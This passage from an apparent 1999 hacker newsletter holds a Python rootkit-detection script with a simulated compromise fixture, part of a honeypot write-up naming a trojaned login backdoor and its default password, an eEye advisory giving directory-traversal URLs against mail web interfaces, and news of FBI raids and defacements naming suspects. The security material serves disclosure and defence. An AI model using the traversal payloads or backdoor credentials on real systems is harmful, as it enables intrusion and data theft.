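    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Baseline: root-relative path -> sha256 for every regular file."""
    base = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full):
                base[os.path.relpath(full, root)] = file_digest(full)
    return base


def compare(baseline, current):
    """Classify files as added / changed / removed, like the report above."""
    return {"added": sorted(set(current) - set(baseline)),
            "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
            "removed": sorted(set(baseline) - set(current))}


def strings(path, min_len=4):
    """Minimal `strings`: runs of at least min_len printable ASCII bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(Path(path).read_bytes())]


def sniffer_indicators(path):
    """Printable strings in the file that contain one of SNIFFER_MARKERS."""
    return sorted({s for s in strings(path) if any(mk in s for mk in SNIFFER_MARKERS)})


def check_login_logs(root, names=("var/run/utmp", "var/log/wtmp")):
    """'missing' / 'empty' / 'ok' per accounting file. A missing wtmp is what
    produced the `last: /var/log/wtmp: No such file or directory` error above."""
    status = {}
    for rel in names:
        p = os.path.join(root, rel)
        status[rel] = ("missing" if not os.path.exists(p)
                       else "empty" if os.path.getsize(p) == 0 else "ok")
    return status


def damage_control(root, baseline):
    """Re-hash the tree, then triage whatever differs from the baseline."""
    report = compare(baseline, snapshot(root))
    suspects = {}
    for rel in report["added"] + report["changed"]:
        hits = sniffer_indicators(os.path.join(root, rel))
        if hits:
            suspects[rel] = hits
    report["sniffer_suspects"] = suspects
    report["login_logs"] = check_login_logs(root)
    return report


def build_fixture():
    """Constructed before/after state: clean tree and baseline, then a simulated
    rootkit install (rpc.nfsd swapped for a sniffer, pid/log files, wiped logs)."""
    root = tempfile.mkdtemp(prefix="tw_")
    for d in ("usr/sbin", "bin", "var/run", "var/log"):
        os.makedirs(os.path.join(root, d))
    sbin = Path(root, "usr", "sbin")
    (sbin / "rpc.nfsd").write_bytes(b"\x7fELF genuine nfs daemon placeholder\x00")
    Path(root, "bin", "login").write_bytes(b"\x7fELF genuine login placeholder\x00")
    Path(root, "var", "run", "utmp").write_bytes(b"crak0 ttyp0 (constructed record)")
    Path(root, "var", "log", "wtmp").write_bytes(b"constructed wtmp records\n")
    baseline = snapshot(root)
    # --- simulated compromise ---
    (sbin / "rpc.nfsd").write_bytes(
        b"\x7fELF\x00cant get SOCK_PACKET socket\x00cant set promiscuous mode\x00"
        b"sniff.pid\x00eth0\x00tcp.log\x00")
    (sbin / "sniff.pid").write_bytes(b"1302\n")          # constructed pid
    (sbin / "tcp.log").write_bytes(b"")
    Path(root, "var", "run", "utmp").write_bytes(b"")    # cp /dev/null utmp
    Path(root, "var", "log", "wtmp").unlink()             # rm wtmp
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_fixture()
    for key, value in damage_control(root, baseline).items():
        print(key, value)
```

Two things the paper implies but does not spell out: the baseline must live somewhere the intruder cannot reach (read-only media or the protected syslog host), or it will simply be regenerated after the rootkit runs; and the hashing program and its interpreter are themselves candidates for replacement, so on a suspect host they should be run from known-good media.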
Strings confirms rpc.nfsd is the sniffer:

mozart #strings /usr/sbin/rpc.nfsd | tail -15
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
----- [CAPLEN Exceeded]
----- [Timed Out]
----- [RST]
----- [FIN]
%s => %s [%d]
sniff.pid
eth0
tcp.log
cant open log
rm %s

After reviewing the system and understanding what happened, I left the system alone. I was curious to see what the intruder's next steps would be. I did not want him to know that I had caught him, so I removed all of my entries from /usr/sbin/tcp.log.

The Script Kiddie Returns

The following day our friend returned. By logging his keystrokes, I quickly identified the backdoor, /bin/login was trojaned. This binary, used for telnet connections, was configured to allow the account "rewt" root privileges with the password "satori". The password "satori" is the default password for all trojaned binaries that the rootkit lrk4 uses, a giveaway that your system may have been compromised. The intruder was checking on his sniffer to ensure it was still functioning. Also, he wanted to confirm if any accounts were captured since the previous day. You can review his keystrokes at keystrokes.txt. Notice at the bottom of the log our intruder kills the sniffer. This was the last thing he did before terminating the session. However, he quickly returned several minutes later with another session, only to start the sniffer again. I'm not exactly sure why he did this.

This process of checking the system continued for several days. Every day the intruder would connect to the system to confirm the sniffer was running and if it had captured any valuable data. After the fourth day, I decided that this was enough and disconnected the system. I had learned enough from the intruder's actions and was not going to learn anything new.

Conclusion

We have seen in this paper how an intruder may act, from start to finish, once they gain root on your system. They often begin by checking to see if anyone is on the system.
Once they know the coast is clear, they cover their tracks by clearing the logfiles and replacing or modifying critical files. Once they are safely hidden, they move onto new and more damaging activities. These tactics are here to stay, as new exploits are constantly being discovered. To better protect yourself against these threats, I recommend you armor your systems. Basic armoring will protect against most script kiddie threats, as they normally go for the easy kill. For ideas on how to armor your system, check out Armoring Linux or Armoring Solaris. If it is too late and you feel your system has already been compromised, a good place to start is CERT's site "Recovering from an Incident".

Author's bio

Lance Spitzner enjoys learning by blowing up his Unix systems at home. Before this, he was an Officer in the Rapid Deployment Force, where he blew up things of a different nature. You can reach him at lance@spitzner.net.

@HWA

11.0 Cox Report Blasts DOE Computer Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by erewhon

In addition to revealing that China has stolen numerous military secrets from the US, the Cox Report, unclassified yesterday, blasts the Department of Energy on computer security. The report blamed the DOE for giving too much computer access to foreign nationals. The issue is access to systems or information covered by export control laws. While the systems or software are not physically exported, use of the technology by some foreign nationals is called a "deemed export" and is covered under Department of Commerce rules.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0524/web-doe-5-25-99.html

MAY 25, 1999 . . . 18:25 EDT

House report faults DOE computer access by foreign nationals

BY ELANA VARON (varon@fcw.com)

A report issued today about theft of U.S. nuclear secrets by China concludes that the Energy Department has been too free in granting foreign nationals access to its supercomputers.
The report, by the House Select Committee on U.S. National Security and Military/Commercial Concerns With the People's Republic of China, said DOE officials are required to review whether such access violates federal export controls. But the report also said lab officials "lack an essential understanding" of the export rules. The report cited interviews with Commerce Department officials who said they did not recall ever receiving a license application to "export" the technology from any of the labs.

Although the systems or software are not physically exported, use of the technology by some foreign nationals is called a "deemed export" because sending the technology overseas would require a license. The report said the labs do not measure the power of their systems in such a way that they could determine which systems are subject to the export rules, and lab officials never asked Commerce how to determine if the DOE systems were subject to export control.

The report also concluded that foreign graduate students and staff at U.S. universities who are conducting DOE-supported research have the same computer privileges as students who are U.S. citizens, even though some of the foreign students are affiliated with their countries' intelligence agencies. The report noted that DOE is preparing a counterintelligence plan that addresses these issues.

@HWA

12.0 Black Hat Briefings Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

Come and meet the Hackers. Secure Computing has officially announced Black Hat '99, the third annual meeting of the minds between security professionals, white and black hat hackers. (If you are deep in the Security business and can only go to one conference then this is it.) (And Microsoft is now a cosponsor, how ironic is that?)
PR Newswire
http://biz.yahoo.com/prnews/990525/ca_secure__1.html

BlackHat
http://www.blackhat.com/

PR Newswire; Tuesday May 25, 8:45 am Eastern Time

Company Press Release

SOURCE: Secure Computing Corporation

Secure Computing Corporation Announces Black Hat Briefings '99, Bringing Together Corporate and Government Experts, and Hackers to Address Y2K And Enterprise Security

SAN JOSE, Calif., May 25 /PRNewswire/ -- Secure Computing (Nasdaq: SCUR - news) today announced that Secure Computing Black Hat Briefings '99, the exclusive security conference, will take place from July 7-8, 1999 at the Venetian Hotel on the Las Vegas Strip. This third annual conference brings corporate and government engineers and software programmers face-to-face with today's cutting edge computer security experts and ``underground'' security specialists for two days of intensive discussions on who's breaking in to computer networks, how they are doing it, how Y2K is affecting security, and what can be done to address this.

The conference, with title sponsorship by Secure Computing, and lead sponsorship by Microsoft (Nasdaq: MSFT - news), National Computer Security Center, Counterpane Systems and Network Flight Recorders is designed to fill the need of computer professionals to better understand the security risks to their computer and information infrastructures by potential threats. To do this, Secure Computing assembles a group of vendor neutral security professionals at the same forum, where they will candidly discuss and debate the problems businesses face, and the solutions they see to those problems. Secure Computing Black Hat Briefings '99 is not for security dilettantes or marketers looking to hawk their vendors' wares -- just straight talk by people who make it their business to explore the ever-changing security space.
Spanning two days the conference has three separate tracks, two focused at technical audiences with a third a new ``White Hat'' track that is focused at CIO's, CEO's and other senior level people. Topics will include Y2K and what it means to system security, how to detect and repel attacks on a network, secure programming techniques and tool selection for creating and effectively monitoring secure networks. Secure Computing Black Hat Briefings '99 intense sessions will bring to light the security problems confronting organizations and network administrators, most of which go unnoticed by today's preoccupied system administrators who are often more worried about network growth, updates and Y2K problems.

Running the conference is Jeff Moss, Director of Assessment Services at Secure Computing. Prior to joining Secure Computing, Moss was at Ernst & Young, LLP, where he was a manager in the Information Security Services (ISS) group. Moss also successfully owned and operated DEF CON Communications, a computer consulting company that focused on network security solutions.

``It is crucial that we continue to educate organizations on the risks they face daily. Network security breaches are real, and are costing organizations hundreds of millions of dollars every year,'' said Moss. ``The coming year will be crucial for organizations in regards to their network security. Taking a myopic approach only to the Y2K issue that does not involve diligent attention to security could lead to severe consequences. Being Y2K compliant really won't matter for much if an organization's network is rendered ineffective by hacker attacks and intrusions.
That is why a forum like Secure Computing Black Hat Briefings '99 is so important in educating businesses and governments about the very real threats that are out there.''

Presenters range from corporate and government security system managers to master hackers themselves, including Dr. Mudge, one of the prominent members of the hacker group 'The L0pht', who is responsible for numerous advisories and tools in use in both the black hat and white hat communities; Peter Shipley, who is well known and respected in the professional world as well as the underground and hacker community and whose specialties are third party penetration testing and firewall review, computer risk assessment, and security training; and Bruce Schneier, author of Applied Cryptography and president of Counterpane Systems.

More Information, and How to Register

Detailed information on Secure Computing Black Hat Briefings '99, including a speaker's schedule, biographies of presenters, and information on how to register and reserve hotel rooms, can be found via the Secure Computing Web site (http://www.securecomputing.com) and by clicking on the Black Hat Briefings '99 icon.

About Secure Computing

Headquartered in San Jose, Calif., Secure Computing Corporation provides enterprise-wide network security solutions to a worldwide partner and customer base in financial services, telecom, aerospace, manufacturing, hi-tech, service providers and government agencies. More information is available over the Internet at www.securecomputing.com or by calling: in the U.S., 800-379-4944 or 408-918-6100; in Europe, 44-1753-826000; in Asia/Pacific, 61-2-9844-5440.

NOTE: All registration and trademarks are proprietary to their respective owners

From Secure Computing:

The Black Hat Briefings '99, July 7-8th Las Vegas

It's late. You're in the office alone, catching up on database administration. Behind you, your network servers hum along quietly, reliably.
Life is good. No one can get to your data or disrupt your WAN. The network is secure. Or is it?

The Black Hat Briefings conference has been organized to put an end to concerns like these. While many conferences focus on information and network security, only The Black Hat Briefings will put your engineers and software programmers face-to-face with today's cutting edge computer security experts and "underground" security specialists. The "White Hat" track will inform your CEO or CIO with no-nonsense information about what issues to be aware of, and what they can ignore. Only the Black Hat Briefings conference will provide your people with the tools and understanding they need to help thwart those lurking either in the shadows of your firewall or the depths of your company's WAN. The reality is, they are out there. The choice is yours. You can live in fear of them. Or, you can learn from them.

Conference Overview

The Black Hat Briefings conference series was created to fill the need of computer professionals to better understand the security risks to their computer and information infrastructures by potential threats. To do this we assemble a group of vendor neutral security professionals in the same room and let them talk candidly about the problems businesses face, and the solutions they see to those problems. No gimmicks, just straight talk by people who make it their business to explore the ever changing security space.

Spanning two days with three separate tracks, The Black Hat Briefings will focus on the vital security issues facing organizations with large Enterprise networks and mixed network operating systems. Topics will include Intrusion Detection Systems (IDS), Computer Forensics (CF) systems, Incident Response, secure programming techniques and tool selection for creating and effectively monitoring your networks. You will be put face to face with the people developing the tools used by and against hackers.
This year the Black Hat Briefings has grown to include a separate track specifically designed for the CEO and CIO. This third track, nicknamed the "White Hat" track, was developed by the National Computer Security Center (NCSC) of the National Security Agency. While the other tracks have a technology focus, this track is for people who have to manage it. What should you look for when hiring an outside security consultant? Should you even look outside your organization?

The Black Hat Briefings' intense sessions will bring to light the security and mis-configuration problems confronting organizations and network administrators, most of which go unnoticed by today's preoccupied system administrators where security gets put off in lieu of constant network growth and upgrades. Our speakers will discuss the strategies involved in correcting existing problems and speak towards what you can expect in the future. This year you can expect more visual demonstrations, more speakers who are authoritative in their fields, and as always an excellent time.

As an added bonus, people who attend The Black Hat Briefings get free admission to DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las Vegas. For more information see their web site.

Who is this conference for?

CEOs and CIOs, MIS and IT managers as well as the people doing the work. Basically anyone dealing with the security functions at your company looking for deep insight into the security space.

Registration Costs

Registration costs are $995 US before June 14th 1999. Late registration fees are $1,195 after June 14th. You may cancel your registration before July 1st for a full refund. This fee includes two days of speaking, materials, a reception, and meals. To register, please use the button on the left hand side of this page. We have excellent rates at the Venetian Hotel! Do not be discouraged by its splendor!
Discount Airfare

We've got great discounts on airfare from Montrose Travel, who book bulk air travel. If you still need to book airline tickets please give Montrose a call first.

Montrose Travel
1-800-301-9673
http://www.montrosetravel.com

They currently have deals for Black Hat attendees from the US and International on the following airlines: America West, Southwest, Delta, American, Southwest Airlines, United Airlines and other smaller carriers and even International Airfare rates. Expect rates lower than published. When calling make sure you refer to The Black Hat Briefings as the group name.

13.0 eEYe Digital Security advisory: Multiple Web Interface Security Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Multiple Web Interface Security Holes

Systems Affected
CMail 2.3
FTGate 2,1,2,1
NTMail 4.20

Release Date
May 26, 1999

Advisory Code
AD05261999

Description:

The following holes were found while testing Retina against various services that have web based interfaces. The holes are nothing amazing, just common amongst many web based interfaces. We are sure some other software will be found with similar holes... if you come across some contact info@eeye.com and let us know.

---> CMail

The default location of the web based interface for CMail is C:\Program Files\Computalynx\CMail Server\pages\. It is a simple hole. For example if we were to load http://[server]:8002/../spool/username/mail.txt in our web browser we would be looking at the email for that user. Note: Mail.txt is not the real mail file. There is one minor problem... reading of files is not totally straight forward. It seems CMail has some mechanism of what it will read or not. If you have a text file with no carriage returns in it CMail will not read it. There also exist multiple buffer overflows within the various SMTP and POP server functions of CMail. Yes they are exploitable. >:-]

---> FTGate

Same as above basically.
http://[server]:8080/../newuser.txt

The only difference is that FTGate doesn't seem to mind if the file has the carriage returns or not.

---> NTMail

NTMail suffers from the same programming flaw... http://[server]:8000/../../../../../boot.ini. There is other server software out there that suffers from these common holes. An average of 65% of the software we have tested thus far has had problems with restricting the path that they allow. NTMail as well as the other two can be run as a service, NTMail does it by default, therefore you can read files as SYSTEM on most of them.

Fixes

Disable the web interfaces where applicable until the vendors release patches.

Vendor Status

All vendors have been notified.

Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com

@HWA

14.0 Fun with ICQ
~~~~~~~~~~~~

Just stumbled across this site in my travels, has some interesting info, check 'em out....

From http://home.earthlink.net/~childzplay/comp.html

Although Mirabilis says they do not recommend using 99a yet, I've been using it for about 1 month and haven't had any trouble with it. Some other people I know have not been so lucky.
I guess it is a use at your own risk deal until they officially release the 99a final version. If you didn't know, the server that comes as default in v.99a is watched closely by Mirabilis. Therefore, if you want to go on an exploit journey, I would suggest connecting up to a more stable, and less watched server. Here are some for your entertainment:

Mirabilis.com 4000, ICQMirabilis.com 4000, icq.mirabilis.com 4000, icq0.mirabilis.com 4000, icq1.mirabilis.com 4000, icq2.mirabilis.com 4000, icq3.mirabilis.com 4000, icq4.mirabilis.com 4000, icq5.mirabilis.com 4000, icq.lmirabilis.com 4000, 38.151.231.40 4000, 38.161.231.4 4000, 38.161.231.40 4000, 38.161.231.41 4000, 38.161.231.44 4000, 38.161.231.45 4000, 38.161.231.49 4000, 38.161.232.40 4000, 38.161.232.44 4000, 38.161.232.45 4000, 104.99.113.49 4000, 105.99.113.49 4000, 202.68.84.41 4000, 204.91.242.25 4000, 204.91.242.35 4000, 204.91.242.44 4000, 204.91.242.112 4000, 204.91.243.90 4000, 204.91.243.113 4000, 204.91.243.115 4000, 207.95.232.2 4000, 208.21.43.40 4000, 208.21.43.50 4000, 208.22.84.41 4000, 208.161.231.40 4000, 208.202.84.11 4000, 208.202.84.21 4000, 208.202.84.41 4000, 208.204.84.41 4000, 208.208.82.41 4000, 208.208.84.41 4000, 208.215.43.40 4000, 208.215.43.41 4000, 208.215.43.50 4000, 208.215.43.50 4000, 208.215.43.77 4000, 208.215.43.90 4000, 208.315.43.50 4000, 209.83.180.44 4000, 209.83.180.45 4000, 209.91.242.25 4000, 209.91.242.35 4000

@HWA

15.0 FBI raids suspected hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Received: by hackernews (mbox contact) (with Cubic Circle's cucipop (v1.31 1998/05/13) Thu May 27 15:40:08 1999)
X-From_: [deleted]@hotmail.com Wed May 26 16:20:14 1999
Delivered-To: submit@hackernews.com
Received: from hotmail.com (law2-f208.hotmail.com [216.32.XXX.XXX]) by hackernews.com (Postfix) with SMTP id A87D4469F for ; Wed, 26 May 1999 16:20:13 -0500 (EST)
Received: (qmail 39781 invoked by uid 0); 26 May 1999 21:23:12 -0000
Message-ID:
<1999052621.39780.qmail@hotmail.com>
Received: from 192.116.XXX.XXX by www.hotmail.com with HTTP; Wed, 26 May 1999 14:23:11 PDT
X-Originating-IP: [192.116.XXX.XXX]
From: "[deleted]" <[deleted]@hotmail.com>
To: submit@hackernews.com
Subject: www.fbi.gov IS DEAD
Date: Wed, 26 May 1999 21:23:11 GMT
Mime-Version: 1.0
Content-type: text/plain; format=flowed;
Return-Path:

Date: 5/26/99 17:23
Received: 5/27/99 16:48
From: [deleted]@hotmail.com
To: submit@hackernews.com

FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH)
www.fbi.gov IS DEAD
im the Israeli ghost and yes i am from israel
the fbi will stop hunting hackers
gangsters dont dance we boggy
today is the 25.5.99 israeli time is : 00:22
www.fbi.gov will stay down all day !

the Israeli Ghost

_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com

FBI Raids Suspected Crackers.

contributed by darkscent

It is often difficult to separate the fact from the fiction, rumors, supposition, and unsubstantiated allegations that fly around the net when big news breaks. This is what HNN has been able to verify so far. Yesterday morning at approx 6:00 am CST the FBI executed nine search warrants in Houston, Seattle and various California locations. HNN believes that some of those who were raided were iCBM, MostHated, loophole, Spaceg0at, soulblazer, fryz, vallah and Cl0pz. HNN has not learned of any arrests that have been made. While the FBI has not revealed why the search warrants were executed it is believed to have some relation to the recent crack of whitehouse.gov. HNN has received no confirmation of Most Wanted lists or FBI Directives, rumors of which have been floating around the net.

MSNBC
http://www.msnbc.com/news/273819.asp

In response to the recent raids several other members of gH (Global Hell) as well as other groups such as Team spl0it have attacked numerous web sites (estimates range between 40 and 100).
The FBI has admitted to receiving a major Denial of Service attack, and the US Senate web site was defaced for a few minutes. In an interview with MSNBC MostHated said "The retaliation has to stop." HNN received an email from "Israeli Ghost" claiming responsibility for the FBI DoS attack. HNN was also able to snag the US Senate web page defacement before it was restored.

Nando Times
http://www.techserver.com/story/body/0,1634,53692-86005-610419-0,00.html

CNN
http://www.cnn.com/TECH/computing/9905/27/senate.hackers/

C|Net
http://www.news.com/News/Item/0,4,37138,00.html?owv

Israeli Ghost Email
http://www.hackernews.com/orig/ghost.html

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

Last week, a gH member Zyklon (Eric Burns), was indicted in connection with three separate attacks on Virginia area systems owned by Computer Tech Services, Issue Dynamics, and Electric Press which housed the web site of the United States Information Agency. The Seattle Times has run a biographical piece on Zyklon. The story has quotes from his classmates and parents.

Seattle Times
http://www.seattletimes.com/news/local/html98/hack_19990525.html

Zyklon's Indictment
http://www.hackernews.com/orig/zyklon.html

MSNBC: Feds vs. hackers: The battle widens

FBI and Senate shut down Web sites after a series of attacks; skirmishes waged with search warrants and Internet sieges

By Brock Meeks, Alan Boyle and Bob Sullivan
MSNBC

May 28 Computer attacks on the FBI and U.S. Senate Web sites are leading to a broader criminal investigation into such intrusions, officials indicated Friday. The latest skirmish between federal authorities and Web site attackers began Wednesday with FBI raids on purported members of a group called gH, or Global Hell, in at least three states and has continued with a protest campaign targeting a wide spectrum of Internet sites.

THE FBI and Senate Web sites remained inaccessible Friday as a result of the computer attacks.
The FBI shut down its Web site Wednesday after it was swamped by a denial-of-service attack. The Senate took its site offline Thursday night after attackers broke into the public computer server and replaced the congressional body’s home page with a screed against the FBI.

The hacked page claimed credit on behalf of a group known as the Masters of Downloading, or M0D — and denigrated the FBI as well as Global Hell. “The FBI may be all over the other groups like ... gH and tK. ... M0D make those morons look like a group of special-ed students! FBI vs. M0D in ’99, bring it on!” read the page, which was peppered with ruder comments and hacker lingo.

The intrusion “compromised our Senate Internet Web site, and as a result the Senate has taken down our Web page to do some investigation,” said Sherry Little, a spokeswoman for the Senate sergeant-at-arms, who manages the site. She said FBI agents were heading up the investigation. “They’re looking at the criminal aspects of it,” she told MSNBC. “They’re in charge of the investigation, in that they’re trying to determine where it came from and whether there was any connection at all to any incidents that they’ve explored in the past.”

The Web outage rendered the official home pages of all 100 senators and senatorial committees inaccessible, but e-mail and other computer services not related to the public Web site were unaffected, Little said. System administrators for the FBI and the Senate Web sites were beefing up site security during the down time — and no one could say exactly when the sites would be returned to service. “We’re not expecting this to be a long-term problem,” Little said.

The FBI was continuing its investigation into the attack on its own Web site, said Dave Miller, a media representative at the bureau’s national office.
He confirmed that “this could result in criminal penalties.” Although he declined to provide specifics on the investigation, Miller told MSNBC that “it would be a logical point” that the FBI would look for connections to past attacks on federal Web sites. Earlier this month, Global Hell was implicated in attacks on a variety of U.S. government sites, including sites for the White House, several Cabinet departments and the U.S. Information Agency. Last week, Global Hell member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three attacks on government computers. Members of Global Hell reported that law-enforcement officials served search warrants early Wednesday in Seattle, Houston and California. In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating “allegations of computer intrusions” involving a teen-ager who uses the hacker handle “Mosthated.” He said the investigation was continuing and declined further comment. In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were “really mad. ... The computer had all their financial information and stuff on it.” Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was “really mad.” Mosthated said at least eight other people around the country had been served with search warrants as part of “a huge hacker crackdown.” Four other Houston-area hackers, three in California and one in Seattle reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said. An FBI representative in San Diego said she could not comment on the investigation because the paperwork was sealed. Inquiries with the bureau’s Seattle office met with a similar response: “Right now there are still things that need to be decided,” one agent told MSNBC on condition of anonymity. 
White House Web site shut down The bureau’s Web site went out of service only hours after the raids. According to AntiOnline, a computer security site, an individual calling himself Israeli Ghost was taking credit for the attack on the FBI’s site. “FBI will not (profanity deleted) with my friends from Global Hell,” the hacker allegedly wrote in an e-mail to AntiOnline. Other members of the hacking community, contacted by MSNBC, said the FBI site was hit by what’s called a denial-of-service attack. In such an attack, the host computer is not actually controlled by an outsider; rather, outsiders bombard a Web site with so many simultaneous hits that it becomes overwhelmed and can no longer function. Mosthated said he didn’t know who was responsible for the denial-of-service attack. The FBI did ask some cursory questions about this month’s attack on the White House Web site. He said he was shown printouts of Web stories about the incident from MSNBC and CNN. “But they didn’t really push those questions,” Mosthated said. As the day went on, other Web sites — none of which had any apparent connection to the FBI — were defaced. A correspondent claiming to be a Global Hell member called Infamous sent an e-mail message to MSNBC Wednesday night criticizing the FBI and saying he “defaced over 40 web domains today to state my opinion.” The writer’s identity could not be confirmed, however. ‘THIS NEEDS TO STOP’ The response to the raids has spread through the digital underground and taken on a life of its own, a spontaneous act of retaliation that wasn’t asked for. “The retaliation has to stop,” Mosthated said. “All this ... needs to stop. Have you seen all the Web pages that have been changed in the last hour? Someone told me that there’s been more than a hundred,” he said. “This (retaliation) is just going to look worse on the people that did get raided,” said the 18-year-old Mosthated, who says he stopped hacking last summer to set up his own security firm. 
This impromptu show of support is going to backfire, he told MSNBC. “Everything that gH has done is going to be put on my shoulders,” owing to his position as the group’s founder. The FBI agents who executed a search warrant on Mosthated said they were looking for evidence related to “illegal telecom activity,” he said, in particular illegally set-up conference calls. “The FBI told me some company lost $250,000 because of the illegal conference calling activity,” he said. Mosthated and other sources indicated that the FBI appeared to be targeting other figures prominent in the hacker community. AntiOnline published a list of almost 100 computer handles, purportedly taken from directives sent by the FBI to Internet service providers. Seattle Times; Posted at 12:02 p.m. PDT; Tuesday, May 25, 1999 Suspect was star hacker on the Internet but shy and lonely in real life by Roberto Sanchez Seattle Times staff reporter In the world of computers, he was Zyklon, the aggressive "cracker" named after a poison gas, who had the skill to break into the Web sites of movie studios, universities and even the Chinese government. But on the other side of the monitor - according to federal prosecutors - Zyklon was really Eric Burns, a lanky, shy, 19-year-old, a former student at Shorewood High School with few friends, several run-ins with the law, and an unhealthy obsession with a woman who didn't know anything about him. Burns last week was indicted by a federal grand jury in Alexandria, Va., on three counts of computer intrusion. Prosecutors say Burns broke into hundreds of Web pages, altered files and caused thousands of dollars in damage. They say he often left behind text taunting his victims and professing his unrequited love for the woman, a former high-school classmate. Burns lives in Shoreline. But he was indicted in the Washington, D.C., suburb because that's where the compromised computer systems are located. 
Burns and his parents, Alice and Edward, did not return calls for comment. His lawyer, Ralph Hurvitz, advised his client not to give interviews. He said Burns will plead not guilty. Acquaintances of Burns - who also took classes at Shoreline Community College last year - describe him as the stereotypical computer nerd: shy, didn't talk to many people, had few friends and spent much of his time on the computer. "He was very smart, one of the smartest kids I know," said David Thompson, a member of Shorewood's class of 1998. "Eric knew and knows so much about computers. He's kind of a freak that way." Even the woman, whom Burns idolized in practically every Web site he hacked, said she had never talked to or been personally approached by Burns. "I didn't know who he was or what he did," she said. She said she took one law class with him her senior year of high school. After that, she began to receive letters from him, then gifts. Court records say she received a crystal bell and a diamond necklace, which her family returned. "Halfway through my senior year, someone called my house and told me to look up this (Web) address" for some of his handiwork, the woman said. She never did. She said she didn't go to the police or seek a restraining order because Burns didn't seem dangerous. "He never did anything to threaten me," she said. A former friend said Burns had a mean side, which he often expressed in his hacking and "cracking" - the term for breaking into Web sites. "He was into it for the power," said Eric Lindvall, a former student at Shorewood who was a friend of Burns' in 1994. He said he, Burns and two other students spent much of their free time together, breaking into computer or phone systems, getting access to credit-card numbers and phone accounts. Lindvall said he and Burns actually got caught by FBI agents in 1994 when they used a stolen credit-card number to buy computer equipment. 
They were not prosecuted, and he said he stopped spending time with Burns after that. Lindvall also said Burns and two other students were arrested in 1996 for allegedly using stolen credit-card numbers to buy computer gear, then reselling it to stores or individuals. Again, Burns was not prosecuted, he said. An affidavit filed by the U.S. Attorney said Burns bragged online to an acquaintance about getting caught for credit fraud as a minor. The Shoreline Week, a community newspaper, published a story Oct. 2, 1996, about three Shoreline teens arrested for credit fraud.

Whatever popularity Burns lacked in the real world, he made up for on the Internet. His alleged exploits were regularly featured in Web sites dedicated to computer hacking. Some people even admired him; a cracker who defaced the University of Washington's engineering Web site in April dedicated the deed to Zyklon. Zyklon apparently took his name from the gas used by Nazi Germany to exterminate Jews.

Burns will be arraigned on June 14. If guilty, he faces up to 15 years in prison.

Roberto Sanchez's phone message number is 206-464-8522.

Copyright © 1999 Seattle Times Company

@HWA

15.1 Real life hacker wargames
~~~~~~~~~~~~~~~~~~~~~~~~~

RAIDED HACKERS
by BHZ, Friday 28th May 1999 on 6.32 pm CET

Our new Special Report talks about recent hackers versus Government, and FBI versus hackers, relations. The White House was hacked, the US Senate was hacked, but several hackers have been found. Read the article Real hacker war-games.

Real hacker war-games

Recently hackers have become more and more active. US government and university sites keep getting hacked. Even the official White House site (www.whitehouse.gov) was hacked, and replaced with anti-Clinton messages and pictures. The Government struck back. Eric Burns aka Zyklon, a gH member, was caught and indicted on counts relating to several break-ins. His name was also mentioned in the "greetz" area of the hacked White House site, so he was questioned about that too.

Zyklon, 19 years old, could get up to 15 years of imprisonment. His fellow hackers from gH hacked several domains in revenge, with messages of protest against the Government. MAST3RZ 0F D0WNL0ADING earlier today hacked the official US Senate site (www.senate.gov), and wrote about the battle against the FBI and US government. The FBI site (www.fbi.gov) was under a big DoS (denial of service) attack, and the "attacker" mailed HNN about it (read his mail in the HNN Buffer Overflow section).

Today AntiOnline and HNN published more details of the hackers raided by the FBI 2 days ago. HNN wrote that: "some of those who were raided were iCBM, MostHated, loophole, soulblazer, fryz, vallah and Cl0pz". We found out that the following hackers were also involved in these FBI actions:

- Zyklon (he is found and indicted)
- Spacegoat (already found)
- Spade (already found)
- Overfien (still looking for him)
- Rottenboy (still looking for him)
- Hybrid (still looking for him)
- Sketch (still looking for him)
- Lord Omino (still looking for him)

The crew from Channel 12 did a background check on the hackers and their supposed crimes.

- Rottenboy aka PowerDragon is wanted for telecommunications fraud
- Gino Ramano is also wanted for telecommunications fraud
- Lord Omino aka moviesmith is also wanted for telecommunications fraud
- Overfien is suspected of:
  1. hacking various subnets for the hacker group GH
  2. hacking mit.edu, zapnow.com, wwu.edu, washington.edu
  3. cracking into SIPRNet (the government's classified network)
  4. leaving 221 computers infiltrated with the words "overfien wuz here"
  5. being wanted in Oregon for Western Union fraud ("$60,000")
  6. also possible counts of forgery and theft
- Sketch aka mode is wanted for telecommunications fraud
- Grip aka JF is wanted for hacking
